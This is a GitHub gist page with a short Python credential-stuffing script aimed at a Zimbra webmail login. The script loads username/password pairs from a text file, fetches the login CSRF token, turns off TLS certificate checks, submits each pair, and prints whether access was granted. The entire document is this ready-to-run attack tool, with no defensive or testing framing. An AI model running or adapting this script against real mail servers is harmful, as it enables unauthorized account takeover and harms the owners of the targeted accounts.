Skip to content

Instantly share code, notes, and snippets.

@marcosValle
Created December 7, 2018 23:07
Show Gist options
  • Save marcosValle/2ffbc101c859f8c77a6e7dbbd25ed1e8 to your computer and use it in GitHub Desktop.
Save marcosValle/2ffbc101c859f8c77a6e7dbbd25ed1e8 to your computer and use it in GitHub Desktop.
Zimbra Cred Stuff
from termcolor import colored
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
#creds.txt in this format:
#mylogin 12345
#otherlogin 54321
#...
def readCreds(fpath):
d = {}
with open(fpath, "r") as f:
for line in f:
(key, val) = line.split()
d[key] = val
return d
URL = 'https://correo.mydomain.com'
d = readCreds("creds.txt")
for username, password in d.items():
print(colored("[+] Trying login > {}:{}".format(username, password), "blue"))
client = requests.session()
client.get(URL, verify=False)
if 'ZM_LOGIN_CSRF' in client.cookies:
csrftoken = client.cookies['ZM_LOGIN_CSRF']
login_data = dict(loginOp="login", login_csrf=csrftoken, username=username, password=password, client="preferred")
r = client.post(URL, data=login_data, headers=dict(Referer=URL), verify=False)
if(b"The username or password is incorrect" not in r.content):
print(colored("[+] ACCESS GRANTED", "green"))
else:
print(colored("[-] ACCESS DENIED", "red"))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment